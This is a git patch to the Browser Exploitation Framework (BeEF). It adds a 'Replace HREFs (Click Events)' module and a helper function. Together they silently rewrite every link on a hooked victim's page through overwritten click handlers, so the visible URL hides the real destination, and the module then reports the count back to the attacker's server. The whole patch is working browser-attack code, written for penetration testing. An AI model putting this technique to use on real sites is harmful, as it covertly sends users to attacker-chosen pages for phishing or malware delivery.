From 7e57313e2100ecab00b1ddda285e32e44db75adf Mon Sep 17 00:00:00 2001 From: Christian Frichot Date: Mon, 25 Mar 2013 19:26:59 +0800 Subject: [PATCH] New Link Rewrite (Hidden using overwritten click handling) module. #860 --- core/main/client/dom.js | 17 +++++++++++++++++ .../link_rewrite_click_events/command.js | 10 ++++++++++ .../link_rewrite_click_events/config.yaml | 16 ++++++++++++++++ .../link_rewrite_click_events/module.rb | 18 ++++++++++++++++++ 4 files changed, 61 insertions(+) create mode 100644 modules/browser/hooked_domain/link_rewrite_click_events/command.js create mode 100644 modules/browser/hooked_domain/link_rewrite_click_events/config.yaml create mode 100644 modules/browser/hooked_domain/link_rewrite_click_events/module.rb diff --git a/core/main/client/dom.js b/core/main/client/dom.js index 9f737c8da..305ef0366 100644 --- a/core/main/client/dom.js +++ b/core/main/client/dom.js @@ -178,6 +178,23 @@ beef.dom = { }).length; }, + /** + * Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting. + * http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html + * @param: {String} url: the url to be rewritten + * @param: {String} selector: the jquery selector statement to use, defaults to all a tags. + * @return: {Number} the amount of links found in the DOM and rewritten. + */ + rewriteLinksClickEvents: function(url, selector) { + var sel = (selector == null) ? 'a' : selector; + return $j(sel).each(function() { + if ($j(this).attr('href') != null) + { + $j(this).click(function() {this.href=url}); + } + }).length; + }, + /** * Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http) * @param: {String} old_protocol: the old link protocol to be rewritten diff --git a/modules/browser/hooked_domain/link_rewrite_click_events/command.js b/modules/browser/hooked_domain/link_rewrite_click_events/command.js new file mode 100644 index 000000000..ea34eadc8 --- /dev/null +++ b/modules/browser/hooked_domain/link_rewrite_click_events/command.js @@ -0,0 +1,10 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteLinksClickEvents('<%= @url %>')+' links rewritten to <%= @url %>'); +}); + diff --git a/modules/browser/hooked_domain/link_rewrite_click_events/config.yaml b/modules/browser/hooked_domain/link_rewrite_click_events/config.yaml new file mode 100644 index 000000000..15ba268f7 --- /dev/null +++ b/modules/browser/hooked_domain/link_rewrite_click_events/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + link_rewrite_click_events: + enable: true + category: ["Browser", "Hooked Domain"] + name: "Replace HREFs (Click Events)" + description: "This module will rewrite all the href attributes of all matched links using Bilawal Hameed's updating of click event handling. This will hide the target site for all updated links." + authors: ["xntrik", "@bilawalhameed", "passbe"] + target: + not_working: ["O"] + working: ["ALL"] diff --git a/modules/browser/hooked_domain/link_rewrite_click_events/module.rb b/modules/browser/hooked_domain/link_rewrite_click_events/module.rb new file mode 100644 index 000000000..a8235c0ed --- /dev/null +++ b/modules/browser/hooked_domain/link_rewrite_click_events/module.rb @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Link_rewrite_click_events < BeEF::Core::Command + + def self.options + return [ + { 'ui_label'=>'URL', 'name'=>'url', 'description' => 'Target URL', 'value'=>'http://beefproject.com/', 'width'=>'200px' } + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end